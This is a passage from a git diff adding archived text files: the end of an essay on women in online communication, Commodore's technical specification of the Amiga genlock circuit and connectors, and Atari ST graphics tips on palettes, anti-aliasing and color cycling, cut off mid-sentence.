impact on other issues such as racial harassment + versus inclusion, and the participation of gays, and the disabled. + Much is made of the tremendous potential electronic mail and + conferencing have to revitalize participatory democracy, but + intelligent, motivated affirmative action will be needed if racial + and gender barriers are to come tumbling down. Affirmative action can + be done on the institutional level, and it can also be done on a + grassroots level, by friends. + + + Suggested Readings + + First of all, read and communicate with women online. + + There is as yet little published about women and telecommunications. + Meanwhile, the general experience of women in computing is a backdrop + worth exploring. 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"Feminist Theory and Information Technology." + Media, Culture and Society v. 14 (1992):9-29. + + Varley, Pamela. "What's Really Happening in Santa Monica." IMPACT!, + + diff --git a/textfiles.com/computers/genlock.txt b/textfiles.com/computers/genlock.txt new file mode 100644 index 00000000..f1d263d9 --- /dev/null +++ b/textfiles.com/computers/genlock.txt @@ -0,0 +1,447 @@ +Genlock circuit operation description +----------------------------------------------------------- + +Enhancements: + + One feature that space does not allow for now is the ability to +have software control of pixel switch disable. Now this is done with a +mechanical switch. Pixel switch disable allows the user to completely +ignore background video, yet have the Amiga computer genlocked. This +eliminates the problem of software having to be written with genlock +in mind. It would add $5-$10 to cost of goods. The control bits would +be encoded in the vertical interval, as audio on/off is presently +done. Eight to sixteen functions (bits) could be controlled once this +ability is on the board. + + CHROMA KEY -- since all signals are in RGB format, it would be easy +to selectively insert video based on color level. Additional circuitry +would add about $10, but would not fit in the existing case. + + +============================================================ +Circuit description + +The purpose of the genlock peripheral is to synchronize the video +output of the Amiga computer with another video source such as camera, +broadcast, or VCR. Circuitry inside the peripheral allows for the +overlay of computer graphics on whatever video source is connected. +Also provided are facilities for stereo mixing of computer and source +audio. Input to the genlock peripheral is composite source and analog +RGB computer video. Output video is in the forms of composite and +analog RGB for high-resolution viewing on an RGB monitor. Also output +are a master 28.636363 MHZ computer clock, H/2, and V/2 video resets +required to synchronize the computer's graphic devices. Power for this +device is derived from computer +5, +12, -5 volts D.C. rails. + +Circuitry in the peripheral is divided into several main functions +which are: 1) regenerating the horizontal and vertical components of +the original composite source video, (2) phase locking the 28 MHZ +clock to input video horizontal timing, (3) combining source and +computer video, (4) mixing source and computer audio, (5) and encoding +the RGB overlayed video into NTSC or PAL. + +(1) REGENERATING HORIZONTAL AND VERTICAL TIMING + +Source composite video enter on J1. Transistors Q16 and Q7 form a +feedback amplifier with a gain of 3. Simple sync tip clamping is +provided by CR3, whose clamp voltage is set by CR4. The net effect is +to clamp sync tips at around 0 volts. Comparator U3 strips the sync +off of the clamped composite video on it's pin 4. Comparator trip +point is set by resistive divider R55 and R49 to be at about the 50% +amplitude point on the sync. On the output of U3 (pin 9) is composite +sync at TTL levels. + +One-shot U1 is a digital integrator designed to detect when video +drops out for more than 12 lines. The output of this detector forces +crystal mode operation (Q4 enables power to the crystal oscillator) +and selects computer composite sync (J8-19) to insure a stable monitor +picture. Nand gates in U5 form the sync selector logic. + +The composite sync output of selector U5 is decoded into its +horizontal and vertical components. The time constants of +differentiator C21/R56 and one-shot U12 are chosen to trigger only on +the horizontal components of sync. Output on U12 pin 5 is a series of +pulses at a horizontal rate. One-shot U19 forms a negative going +pulse 4.7 microseconds wide buffered by U23 for monitors requiring +seperate horizontal sync (J10-11). The time constants of integrator R77/R76 +/C34 and one-shot U12 are chosen to trigger only on the vertical +component of composite sync. The output on U12 pin 4 is a pulse 90 +microseconds wide on line 3 every vertical interval. One-shot U19 +generates a negative pulse 200 microseconds wide buffered U23 for +monitors requiring seperate vertical sync (J10-10). + +The graphic devices in the Amiga computer require reset every other +vertical interval in genlock mode. Dual-D flip flop U15 performs this +task. It is basically wired as a divide by 2 with horizontal sync +clocking the first stage. This causes the V/2 reset pulse to be +synchronous with horizontal, one line wide, retiming its edges. V/2 +reset is buffered by R10 because at times the Amiga computer will +output vertical pulses on J9-23, (ie. genlock mode not selected with +peripheral attached). + +The sandcastle generator is made up of U2, U7, Q5, and Q6. This +circuitry generates a multi-level pulse, encoding burst and blanking +timing information for U8, the chroma decoder. One-shot U2 time +constants are chosen to generate the blanking portion of the sandcastle +pulse. One-shot U7 time constants are chosen to generate burst timing. +Transistor pair Q5 and Q6 form a low impedance wide-band inverting +summing amplifier. R27 supplies a D.C. offset to give the correct D.C. +levels at Q6 collector for U8. R26 and R31 sum in the blanking and +burst signals respectively. The gain of any signal to this amplifier +is set by the ratio of the input series resistor (R26, R31, R27) to +feedback resistor R28. The sandcastle pulse at Q6 collector encodes +blanking information from 0-5V dc and burst timing from 5-10V dc, with +the pulse looking very much like it's name implies. + +H/2 reset is generated by U14 and U17. The input to one-shot U14 is +regenerated horizontal from the 28 MHZ phase-locked loop. U14 time +constant is 33 microseconds, making a square wave at horizontal rate on +pin 12. Dual D-type flip flop U17 is wired as a gated divide by 2. The +H/2 reset output (J9-21) is a negative going pulse 32 microseconds wide, +with the edges retimed to the Amiga computer color clock (J9-6). This +re-timing to color clock is required to guard against metaphysical +states in the Amiga graphical devices. + +(2) 28 MHZ PHASE LOCKED LOOP + +The circuitry to generate the 28.636363 MHZ clock is comprised of the +voltage controlled/crystal oscillators, phase detector, and divider, the +classic phase-locked loop. The VCO has some unique features. + +The genlock peripheral must generate a stable master clock, allowed to +vary only a few percent in genlock mode. When there is no video on the +peripheral input, crystal stability is required for real-time clocks and +counters. To complicate things the Amiga computer cannot tolerate large +timing variations when switching in and out of genlock mode, missing a +clock cycle is catastrophic. Therefore, a circuit was designed so that a +crystal oscillator can "tickle" the voltage controlled oscillator for +completely synchronous mode switching. + +Q24 and its associated circuitry is the 28 MHZ Colpitts crystal +oscillator. Q23 is a buffer to prevent loading of Q24. Power for Q23 and +Q24 is controlled by Q4, supplying current only when there is no input +video (xtal mode required). + +Q13 and its associated components form a Colpitts voltage controlled +oscillator. The frequency is changed by varying the D.C. control voltage +on CR7, a varactor diode. C60 varies the VCO center frequency. The +connection made by C63 and R128 allows the crystal oscillator to +"tickle" the VCO. For an in-depth discussion on oscillators, consult +"Crystal oscillator Circuits" by Robert J. Matthys. + +Q12 buffers the 28 MHZ clock to the Amiga, (J9-1) setting the correct +TTL levels with R64 and R65. L2 and C41 filter the 28 MHZ to reduce +RFI. + +A synchronous divide by 1820 is formed by U6, U10, U13, U16, U4. U16 +is a schottky device because of the frequency involved. Operation of +this circuit is straightforward. The output of U6 pin 13 is a stream of +pulses at a horizontal rate. This is called regenerated horizontal and +is never interrupted, an Amiga requirement. This signal is one input to +the phase detector. + +The phase detector used is the analog sample and hold type. Basically, +this detector works by sampling a ramp generated from one comparison +frequency (feedback) with a sample pulse derived from the other +(reference). The output D.C. is used to control the VCO. + +The reference input for this phase detector is the horizontal component +of input video, applied to one-shot U11 pin 1. Delay in U11 is about 1/2 +line, with a potentiometer to fine tune horizontal position, R133. U14 +generates a short sample pulse (275 nanoseconds), level shifted by Q14. +Q14 collector drives sample gate Q25, with the sample voltage held on C78. + +The feedback input goes to the other section of U11, again adding a 1/2 +line delay. The output of U11 is used to trigger the ramp generator +formed by Q21 and Q22. Ramp charge time is controlled by C52 and is +designed to accomodate the large timebase errors present in VCR +playback. Ramp charge time is critical in PLL design: steeper ramp means +high gain and less lock range, slower ramp means lower gain but increase +in tracking range. + +The D.C. operating point for this loop is determined by a voltage +divider formed by R106, R156, and R157. It is chosen to give maximum +dynamic range. + +Error signal on C78 is buffered by dual op-amp U20, section 1. Loop time +constants are determined by the R105, C61, C67, R131 around section 2 of +U20. The output of this section drives the VCO, closing the control loop. + +(3) COMBINING SOURCE AND COMPUTER VIDEO + +Now that the Amiga computer is synchronous with the source video, +computer and source video is combined. U8 alone performs the overlay +function. + +The main function of U8 (TDA3301) is to decode composite video into its +red, green, and blue components. First, source video is split apart into +chrominance and luminance. Network L1, C27 and R52 filters out chroma, +passing luminence only information to U8-37. Network R83, L3, C43, and +C28 passes only chroma information to U8-1. U8 also internally has a +3.579545 MHZ PLL. By utilizing luminance, chrominance, sandcastle pulse, +frame pulse (U28-29) and an internal PLL, video is decoded. + +U8 also has inputs for external analog RGB video. Computer RGB is +applied to U8 pins 25, 26, and 24 respectively. The signal that +determines if source on computer video is ultimately output is pixel +switch (J9-4). This is a software generated control line from the Amiga. +One section of gate U5 is used to force pixel switch to show only +computer video when source video is lost. + +Each video output of U8 is D.C. clamped for black level stability. The +following is a description of just the blue channel. Blue video exits U8 +on pin 14. The level is divided down by resistors R71 and R72 and +feedback to pin 16 completing the loop. C25 is used to hold the sampled +clamp value (see Motorola data sheet for full details). The blue video +is then amplified X2 by transistor feedback pair Q10 and Q11. Gain is +set by the ratio of R60/R61. R63 gives the characteristic line impedance +of 75 ohms (J10-5). Operation is similar for the green and red channels. +Other components around U8 are best understood by consulting the TDA3301 +data sheet. + +A hue control (R134) is provided to allow user color matching of +computer and source video. + +(4) MIXING SOURCE AND COMPUTER AUDIO + +The left audio channel mixer is described. Source audio (J3) is +capacitivly coupled by C82 and terminated in an impedance of 47K. +Electronic switch U22 (CD4066BE) is used to disable source audio via +computer control. It operates as follows. + +The control to enable/disable source audio is encoded in the vertical +and horizontal blanking interval of the pixel switch line, software +setable on the Amiga computer. U18 samples pixel switch during the +vertical interval, using the frame pulse to latch audio status. The +latched output (U18 pins 6&5) is used to control transmission gates in +U22. Data is latched on or about line number 10. No horizontal sampling +is done. + +Computer audio enter on J5. Passive mixing network R140, 141, 143, 142 +and control R132 combines the two sources. Pot R132 allows user control +relative levels. Right and left mixing is controlled by the same shaft. + +Feedback pair Q19 and Q20 provide gain (x3) to make up for losses in the +passive mixer. C83 provides bandlimiting (20KHZ) to reduce noise pick-up +within the box. Audio and video grounds are kept seperate until the +connector (J9). + +(5) ENCODING THE RGB VIDEO + +Analog RGB signals are encoded into NTSC or PAL by a single device (U21) +from Motorola, number MC1377. This IC requires only continuous +subcarrier and composite sync to output composite video. Subcarrier is +obtained from the oscillator in U8, coupled by C45. Sync comes from the +output of selector U5. + +The analog RGB signals (0-1v amp.) from U8 are coupled into pins 3,5 +and 4 of U21. Inside the MC1377 a resistive matrix and multipliers +transform RGB into an encoded chroma signal, output on pin 13. To reduce +interference with high frequency luminance information, the chroma is +bandpass filtered to 1 MHZ by T1, R11, C72, and C70. Chroma re-enters +the chip on pin 10. + +The luminance signal is derived via an internal matrix from the RGB +input?? output inverted on pin 6. TD1 delays the luminance information +by 400 ns making up the time delay caused in the chroma path by the +bandpass filter. Chroma and luma are summed and clamped inside U21, +emerging on pin 9 as composite video. Emitter follower Q15 buffers the +video to J6. + +Color burst is also added to the video inside U21. External components +R95 and C69 determine burst position. Pin 16 is a stable zener derived +8.5 volts. + + If you would like to receive your own hard-copy of this spec, +please leave email in mailbox 'techs' + + IMPORTANT: Please make our job easier by including the word + 'genlock' somewhere in the Subject line!! + +Don't forget to leave your name and address. + +I didn't leave out much, the table of contents, a short discussion +of possible uses, a diagram that shows the location of each +connector (to be posted next week) and a drawing the shows the +genlock box and its mechanical interface. + +Thank you, + +Randy Weiner <> Commodore Technical Support + +The following material is excerpted from the preliminary Genlock +spec. + +Please excuse any non-obvious typos, it will take me a week +to uncross my eyes. + Thank you , Randy Weiner 'rweiner' + + + Excerpts from the Amiga Genlock Peripheral Specification + + + +CONNECTORS +================================================== + +Female 23-pin "D" type (to computer) +-------------------------------------------------- + pin 1 : 28.636360 MHZ clock out + 2 : external clock enable out + 3 : red analog video in + 4 : green analog video in + 5 : blue analog video in + 6,7,8,9 : no connection + 10: composite sync in + 11: H/2 reset out + 12: V/2 reset out + 13: ground + 14: pixel switch in + 15: color clock (3.58 MHZ) in + 16,17: ground + 18,19: ground + 20: ground + 21: -5 volts in + 22: +12 volts in + 23: +5 volts in + +Male 23-pin "D" type (to monitor) +-------------------------------------------------- + pin 1 : no connection + 2 : no connection + 3 : red analog video out + 4 : green analog video out + 5 : blue analog video out + 6,7,8,9 : no connection + 10: composite sync out + 11: horizontal sync out + 12: vertical sync out + 13: ground + 14,15: no connection + 16,17: ground + 18,19: ground + 20: ground + 21,22,23: no connection + +RCA-type jacks (8) +-------------------------------------------------- + 1 : composite source video in + 2 : composite video out + 3 : R-source audio in + 4 : L-source audio in + 5 : R-computer audio in + 6 : L-computer audio in + 7 : R-mixed audio out + 8 : L-mixed audio out + + + + +VIDEO PERFORMANCE +================================================== + +Bandwith: + composite -3db luminance at 8 MHZ + Analog RGB -3db at 8 MHZ + Chroma I&Q -3db at 0.5 MHZ + +Locking Range: + Horizontal +/- 2% from 15735 HZ + Subcarrier +/- 300 HZ from 3.579545 MHZ + Vertical crash lock + Horizontal phase +/- 1.5 microseconds + Subcarrier phase +/- 45 degrees from burst + +Timing: + Vertical reset output is 3 lines late + Horizontal reset output is coincident with input + Clock jitter <10ns, 5ns typ. in genlock, + crystal stable with no video source + 28 MHZ clock in genlock mode, is phase locked to + input horizontal timing. Automatic + switch over to crystal mode occurs in + 10 lines of missing source video. No + discontinuity in clock cycles occurs. + +AUDIO PERFORMANCE +================================================== + +Bandwidth: + -3db at 12 HZ and 500 KHZ, flat with 2db + +Gain: + 0 to -50db dependent on mix control setting + + source audio can be disabled (-50db) by setting a bit in pixel + switch line during vertical blanking + + +INPUT SPECIFICATIONS +================================================== + +Female 23-pin "D" type (to computer) +-------------------------------------------------- + pin 3 : analog red -- terminated in 75 ohms, inut level of + 1 volt p-p nominal level. + 4 : analog green -- same as analog red + 5 : analog blue -- same as analog red + 10: composite sync -- TTL level, 10K load, negative going + 14: pixel switch -- TTL level, 1K load, low level enables + external RGB for overlay. During vertical interval, + a low level of pixel switch enables external audio, + high level disables. This level is valid during + horizontal and vertical blanking. + 15: color clock -- TTL level, 4K load, should be synchronous + with host computer, freq. of 3.579545 MHZ. + 21: -5 volts, approx. 50ma load. + 22: +12 volts, approx. 250ma load. + 23: +5 volts, approx. 300ma load. + + + + + +RCA type jacks +-------------------------------------------------- + composite video -- 75 ohm load, 1 volt p-p, 0.3 volt sync, + +/- 6db, will accept block vertical + R-source audio -- 4000 ohm load, 1 volt rms nominal + L-source audio -- same as above + R-computer audio -- same as above + L-computer audio -- same as above + +OUTPUT SPECIFICATIONS +================================================== + +Female 23-pin "D" type (to computer) +-------------------------------------------------- + + pin 1 : 28.636360 clock -- semi-sinusoid, able to drive two + schottky TTL loads + 2 : external clock enable -- low active, direct connect. to gnd. + 11: horizontal reset out -- low active, 'LS244 driver, low for + 32 microseconds at beginning of a horizontal line. + 12: vertical reset out -- low active, 'LS244 driver, occurs + on line 3, 30 microseconds wide. + +Male 23-pin "D" type (to monitor) +-------------------------------------------------- + pin 3 : red analog video - 75 ohm impedance, will drive 1 volt p-p + into 75 ohms load + 4 : green analog video - same as pin 3 + 5 : blue analog video - same as pin 3 + 10: composite sync -- low active, 'LS244 driver + 11: horizontal sync -- low active, 'LS244 driver, + 4.7 microseconds wide + 12: vertical sync -- low active, 'LS244 driver, 3 horizontal + lines wide. + +RCA jacks +-------------------------------------------------- + composite video out - 75 ohm impedance, 1 volt p-p into 75 ohm + load, 0.3 volts sync. + + R-mixed audio -- 100 ohm impedance, 1 volt RMS into 600 ohms. + + L-mixed audio -- same as above + diff --git a/textfiles.com/computers/gfxhints.txt b/textfiles.com/computers/gfxhints.txt new file mode 100644 index 00000000..54932f7a --- /dev/null +++ b/textfiles.com/computers/gfxhints.txt @@ -0,0 +1,565 @@ + + COMPUTER GRAPHICS + + Some Hints on How to Improve Your Graphics + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Here are some hints for those of you who would like to improve your + technique when making your own illustrations, for example paintings and + title screens on the Amiga. + + I would like to stress the point that this article will not turn + you into an instant artist as the subject is technique, not art. + + The computer as a medium for creating graphics has some built-in + problems. However, let it be known that other mediums such as oil-paint, + watercolour, ink, and crayon just to mention a few have just as many + shortcomings and limitations. + +Some of the shortcomings of computer painting are: + i) the limited number of colours + ii) creating gradual shading or flow of colour +iii) putting in extremely small details + iv) the step effect created by lines that are on an angle + v) expression of material e.g. hair + vi) the screen (canvas) size + + Some of these problems along with some others will be dealt with in + the course of this article. + + +CREATING A WORKING DISK + + If you don't want to go to the trouble of creating a formatted + blank disk with a directory for the images, you have to make enough + disk space on the disk with the painting programme to save your creations. + + +CHOOSING YOUR OBJECT + + Care should be taken in choosing your object to be painted. The + two biggest pitfalls are small details and the need for too many colours. + + Start off by choosing a painting that has no more than one or two + objects. It will help you to cope with the limited number of colours at + your disposal. For this exercise I would choose a flower as most + flowers are of a single colour, and basically you will need only two + colours, one for the flower itself and one for the stem and leaves. The + other 14, or so colours left, depending on the resolution you are + using (more of that later) can be devoted to shading, highlights, and + shadows. + + +TRANSFER OF OBJECT TO THE SCREEN + + I suggest that you copy an existing illustration to start off with + because there are enough technical problems without creating artistic + ones as well. + Having chosen your object to copy how do you get the outline and + details onto the screen? If you are painting from a photograph, postcard, + magazine, or book you are faced with the problem of transferring the + image to the screen preferably without damage to the original. + Programs like DEGAS ELITE have a grid-tool that will help you to create + a screen that looks like graph paper. Using this grid-tool create a + grid where both the vertical and horizontal lines are approximately 10 + mm apart on the screen. + +To get the grid for Degas Elite: + + + Go back to the screen and count the number of whole squares from + top to bottom. Do not count the incomplete block at the top and the + bottom. + + Next, go back to the picture and measure the height only. Divide + the height by the number of vertical squares that you have counted on + the screen. For Example: picture height 260mm, number of squares on + the screen 13. Divide 260mm by 13 screen squares = 20mm. Divide your + picture now by drawing vertical lines 20mm apart. If you do not wish + to damage your picture stretch a sheet of tracing paper over the top + of it and do all line work on the tracing paper. + + Number the row of blocks along the top starting by placing a 1 (one) + in the block on the left. Number the row of vertical blocks on the + left hand side starting by placing a 1 (one) in the block at the top. + The number 1 (one) will be common to both the vertical and horizontal + rows of blocks. + + Go back to the screen and with the freehand-tool write in the + numbers corresponding to those on your picture. Make sure that the + numbered grid is in the centre of the screen. (When finding the middle + line of the screen don't forget the part under the palette.) Rows of + blocks on the right and left of the centered grid can be deleted. + + If your picture happens to have more horizontal blocks than the + screen has you will have to decide which part of the picture horizontally + is most important to you. This, however, does not happen very often. + + Now draw the outline and details by looking at the picture and + drawing lines in the corresponding blocks. The numbers at the top + and bottom of the screen and the picture will help you to identify + corresponding blocks.The mouse is not the ideal tool for drawing, but + the outline does not have to be perfect. If you have chosen a face or + head make sure the important details such as eyes and nose are in the + right place. + + When you have finished with the outline and details remove all the + grid lines by using the background colour. My use of colours, in most + cases is black for the background and cream-white or brown for the line + work and grid lines. Background colours other than black are likely to + interfere with colours in the picture and white line work is hard on + the eye. + + +CHOOSING YOUR PIXEL SIZE + + Not much choice here...unless you use something like SPECTRUM 512 +you've got 16 colours in lo-res. + If you are about to start your first picture I would recommend using + lo-res. (surprise,surprise) + + The interference of adjacent colours can be very useful. + Dots of white and red next to each other will result in pink. + Two white dots with one red dot on the side will give white with a pink + edge. + Five shades of grey with one red (6 basic colours) will result in 15 + colours - 1 red + 5 shades of grey + 5 combinations of red with grey + + 4 further combinations of grey. + + I will leave it to you to figure out the total number of combinations + possible with 16 colours. + + +CHOOSING YOUR PALETTE + + The choice of the palette is probably the most important step. A + bad choice of colours will result in a continuous struggle for more + colours. Because there is no interference from adjacent colours with + lo-res care should be taken to ensure that besides the basic colour + chosen for your object you have 2 or 3 shades that are lighter and + darker than it. This will make it easier to create shadows and highlights. + The computer programmes have a feature called "range". After you specify + the darkest colour and say 5 colours away, the lightest colour, + the programme will select the in-between colours. To modify the Degas + palette check them DOCs! We've also covered some other Art packages like + NEO, so take your pick! + The colour to be changed you can alter the colour with the RGB-controls. + All 16 colours can be changed, but care should be taken with some + of the colours as they are basic to background, lettering and borders. + + It is of note that AMIGA users get very used to lots of colors.Because + only 16 colours are available to us it is very important that every colour + can be used to create several other colours. For example, white with dark + green could cut out the need for light green. Some experimentation + on a free part of the screen will help you to decide. + + Because I do not know what you are going to paint I can only give a + typical palette. It should contain black and white and at least 4 + following shades of grey and brown. Since grey and brown are not very + strong and are easily overshadowed by the prime colours (red, blue and + yellow) their effect will result in darker and lighter shades of the + prime colours so essential for good shadow work and highlight details. + + + +CREATING YOUR MASTERPIECE + + At this stage we have an outline of the picture, and a palette. If + you wish to use the spray-paint tool this is the time to use it. Spray + painting can be very effective for some backgrounds. Choose a "spread" + that is not too big, and limit the numb er of dots. Give the background + the basic colour you want it to be and spray the desired pattern. If you + do not use "masking" of your major object the limited spread and small + number of dots will prevent too many unwanted dots getting into your + object. + Also, staying away from the object and imitating the spray pattern close + to it using a single pixel brush will help. + If using more than one spray colour use the darker spray at the bottom and + the lighter one at the top. The dark colour will work as a foundation. + However, if you use spray for sky the darker colour should go to the top. + It will give the painting depth. + + + Filling in is the next step. Before you use the fill-in tool make + sure you do not have any breaks or gaps in your outline. You can check + for breaks by using the magnifying-tool. If you overlooked a gap and + part of the painting that you didn't want to fill-in gets filled-in, + use the UNDO to remove it, close the gap and try again. + After filling-in all the basic colours check for details that are out of + place. + + Most of the shading in can be obtained by using a progression + of colours. Sometimes better results are obtained by using a basic + colour and a progression of darker brown dots for red, yellow and green, + and grey dots for white and blue. At the cost of time you can create a + checkered pattern. It could for example be made up of red and brown + squares. By progressively using darker browns the red will also darken + by the influence of the brown. The brown dots can't be seen as the red + is the mo re dominant colour. It will appear that the red gets darker, + creating an illusion of a shadow. Using two shades of red will extend + the range from light to dark even further. + + A typical annoying feature of computer graphics is that lines on an + angle and curves have little steps. Most of these steps can be eliminated + by putting in an intermediate colour. For example, if the object with the + steps is red and the background colour is black put brown dots in + the corners of the steps. The ragged outline will then be smoothed out. + + Most of what has been said here can be seen by scrutinizing my two + paintings on this disk. Both of the paintings are med-res and they can + be transferred to a painting programme to be looked at with the + magnifying-tool. + + +BACK-UP + + Finally, I would like to advise you to save your work each hour. + Also, at the end of your day's work make a back-up copy. Detailed + paintings can take several days to complete. + To lose a painting because of memory or disk failure can be very + disheartening. (And don't we just know it!!) + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~ END OF PAINTHINTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +TEX PAINT-HINTS..Part of a series in ST NEWS disc magazine. + +by Erik of The Exceptions + +The fourth part of this highly popular series is here. This time, +ES will talk about some graphic-tricks like transparent graphics, +anti-aliasing and more like that. + + Hi de hi, readers! Have you gained enough energy for yet another +round of TEX-tips? For this part you don't even need specific +assembler knowledge, since it mainly covers my personal field of +expertise: Graphics. Some of you might now think that there's +rather little left to be said about that; many pages in books as +well as magazines have been filled with the subject already, +aren't they? But I am sure that there are some more or less rare +tricks and tips from which you didn't know anything; or are you +familiar with: + + - Anti-aliasing + - Animated graphics by palette animation + - Transparent effects + - Back-and foreground scrolling without programming trouble + + You don't know anything about this? Then it'll be soon - just +read on. Additionally, I will tell you something about the +"Neochrome" drawing program that your surely didn't know. Just +like all earlier episodes in this series, all things said refer +to the low resolution of the ST, where you can normally use 16 +colours (readers of ST NEWS Volume 3 Issue 5 will now of course +chuckle lightly). + Well, let's start to talk about the subjects listed above +systematically. 'Anti-aliasing' is listed first there. This is +commonly used in professional circles of computer graphics +artists. Freely interpreted, this would mean: "How the heck can I +avoid that gradation in my computer picture?" + You all know that the ST, just like its colleague-homecomputers, +has a fairly limited screen resolution. This means that +especially diagonal lines or circles show typical gradations. +Since we cannot fool the hardware in this case, we'll simply have +to fool another 'peripheral': The human eye. We can hereby use +the way an eye sees contrast. When Anti-aliasing, one uses the +following scheme: At the boundary of two colours, one insert some +dots on the gradation that have colours in between the two +colours that you use. That's all. + To demonstrate the remarkable effect, please make a little +practical exercise. You surely have a drawing program with a zoom +function. Load it and define the following colours: + + Background color - 000 + Drawing color 1 - 711 + Drawing color 2 - 600 + Drawing color 3 - 400 + Drawing color 4 - 300 + + Now just draw a triangle with drawing colour 1, and therefore +draw three lines, for example for the upper left corner (position +x=0 and y=0) to position x=20 and y=80, then back to x=0 and y=80 +and then back to the upper left hand corner. Fill it as well, +with drawing color 1. Now, a bright red triangle is on your +screen of which the right side clearly demonstrates the typical +gradation. + Now copy this triangle, so that you have two triangles next to +each other on the screen. The second one will now be anti- +aliased. + Enter zoom mode again and select drawing color 2. Put ONE dot of +this color on each 'stairs' of the gradation at the right side of +the triangle. Then select drawing color 3 and do the same, and a +third time with drawing color 4. Now you have added three +darkening red colors to every gradation. Leave zoom mode and look +at the effect. The difference is quite stunning, isn't it? The +second triangle seems to be displayed in a much higher resolution +than the first one. That's anti-aliasing; quite simple! + When you'd like to experiment a bit more, you can draw a filled +circle in drawing color 1 and again put the darkening shades of +red on the gradation steps. You will then also develop a feeling +of where you can put which number of anti-aliasing-dots, since a +circle contains all different gradation sizes. + Using this technique, all graphics can be enhanced if the color +palette has been properly designed. In our example, black (000) +was the background color, bright red (711) the drawing color and +2-4 were the anti-aliasing colors. + Have fun experimenting with these effects! + + Now, what's up next? Ah! Color palette animation! First, let's +start with a small explanation what this actually is. + The ST has sixteen color registers; when some or all of these +are swapped in a cyclic way, this is called 'color cycling' or +palette animation. This is often used to simulate flowing water, +and one of the oldest "Neochrome" pictures, "Waterfall", is a +typical example. In this case, the shades of blue contained in +the water are swapped in a circle. + But there are much more possibilities with palette animation. I +have always had the dubious pleasure of creating effects with +this that many people considered to be graphic programming. A +very nice application of this technique can be found in the TEX +program "Super Neo Demo Show". There is a scrolling text in the +lower border of the screen, and under that are a lot of small +propellers. After this introduction you will probably not be +surprised to hear that these rotating lines are nothing but +palette animation - which many people were when we initially +explained this trick to them. + How it's done? + Well, it's quite difficult to put into words (like love, ex- +ED.), but I'll give it a try. + Just imagine that you've drawn 12 lines that cross one another +in the middle; each line has its own color. Now, you set all +colors to black with one exceptions: One color remains e.g. +black. In the middle you put a small circle with a non-animating +color to cover the part where all lines cross. If you now let +these 12 colors cycle, you have the impression of a rotating +line, since only one of the 12 lines is displayed in red at a +time. + There are more tricks of this kind, e.g. the hopping dots in the +2nd Psych-O-Screen of our "B.I.G. Demo", but they principally all +use the same trick: About all used colors are put in background +color, and only some of them are colored; by palette animation, +movement starts. One can use this to such extend that an animated +figure, e.g. a little man, walks across the screen. The method is +the same; you draw the movement phases in an other color at each +time and you set them next to each other (they should not +overlap). Since each of the men 'lights up' after the other due +to the color animation, it appears as though the shape walks +across the screen. True animation effects can thus be +accomplished by animating the colors. The disadvantage of this +trick is obvious: When you use a lot of colors for color +animation, only few are left for the rest of the picture. But +that's each one's own decision. + + Well, dear readers, now we're really starting. The previous was +only to be classified among 'harmless toying around', but now +we're really cookin'. Maybe you have seen graphics that seemed +like transparent glass or that seemed to float in some of our +programs. Maybe you wondered which wonderful and difficult +program sat behind it all. Ha! All wrong! I suppose you're just +about used to it, but this is also covered by a sleazy trick. But +to understand it, you must know something about the graphic +buildup of the ST - so I will mention it here in short to refresh +your memory. + In low resolution, it looks like this: A certain piece of memory +is referred to as 'screen memory'. There, four sequential memory +words (1 word = 16 bits) always belong together, and each word +represents a so-called 'plane'. It's best to imagine these four +words lying under each other; this way you see best that each +pixel is represented by four bits. According to this combination +of bits, the color value is taken from one of the sixteen color +registers. With a resolution of 320x200 (640,000 pixels) of which +each pixel can take one of 16 colors, each plane is therefore 8 +Kb in size; an ST graphic screen thus costs 32 Kb. + These planes do not only have to be used to represent colors, +but when you truly look upon them as 'planes' and use them like +that program-technically, there are some interesting aspects. + Let's presume we made a piece of graphics that only uses eight +colors. These colors can be realised with only 3 'planes' (3 +'stacked' bits means 8 combinations possible), so that their +colors will be found in color registers 1 to 8. But there's one +plane left! In this plane, it is for example possible to display +a piece of graphics that only uses one color. When we set color +registers 9-16 to the same value, we can move this piece of +graphics in just one plane (the program only uses each fourth +word) and the corresponding bit combinations only give the colors +in register 9-16. That's how it is possible to put a single-color +piece of graphics on top of one that has 8 colors without +difficult logical operations. + That's all. + + Oh, I hear you call: "What's up then with transparent effects, +and fore-and background, eh?!" Well, program-technical nothing +else happens than what I just described above. All else is +simple brainmangling thought about setting proper color palettes. +Again: Transparent-as well as back-and foreground effects are now +only realised by simply setting proper color palettes! + Therefore you must thoroughly realise what's happening with the +bit combinations when a piece of graphics in one plane is moved +'over' the three others. The colors that result into the +corresponding effect are always the last eight (number 9-16), the +colors located that are called by the corresponding bit +combinations are located there. These are the colors that appear +when the separate plane is moved 'over' the other three - in +other words when the fourth bit (fourth plane) is set or cleared. + When you understand this, it is easy to think of a way to create +the 'transparent' effect: Simply put intermediate colors in the +upper half of the palette that correspond to the brightness of +the other eight. In our program example (present in the disk in +the PROGRAMS folder as a .S file) a bright red 'plate of glass' +moves over a background pattern that only uses shades of grey. +The colors are hereby set as follows: Color 1-8 are black (000) +along all shades of grey to white (777). The 'transparent colors' +9-16 go from dark red (004) to yellow (770). So when the one- +color graphics block of the fourth plane goes 'over' the other +three planes, color 9 appears where 1 used to appear, 10 where 2 +used to appear, etc. Program-technically speaking, this is very +simple, but about that we haven't even talked. + Udo and the others were also quite blabbergasted when I came up +with the idea, you'll believe me. The whole back-and foreground +business is very much the same; just look at the B.I.G. scroller +in our "B.I.G. Demo" where a scrolling text scrolls in between +the fore-and background. + With this effect, one has to set the upper eight colors as +follows: With each of the colors that the one-colored piece of +graphics should go behind, you set the corresponding upper color +to the same. All colors that should be covered by the graphics +block should get the value you want them to have when they move +'in front' of it. So if you want the one-plane graphics block to +move all in the background of all three other planes, one sets +the upper colors exactly the same as the lower ones. + Not really simple, you think? + Hmm. You might be right. But we do everything to get the very +last thing possible out of the ST, don't we? + With this effects, it is also not quite simple to put it into +words (sigh, ex-ED.). When you have a look at our listing (in the +PROGRAMS folder), your last doubts will disappear. + The program does the following: It builds a background pattern +in three planes, thus using the first eight colors. It then makes +a graphic block in the fourth plane move to and fro. Using keys +1-4, it is possible to call different color palettes, that will +support the description I have above. By only pressing these +keys, the following effects are realised: + + Key 1 : Palette 1, one-colored block moves over graphics + Key 2 : Palette 2, block moves in background + Key 3 : Palette 3, block 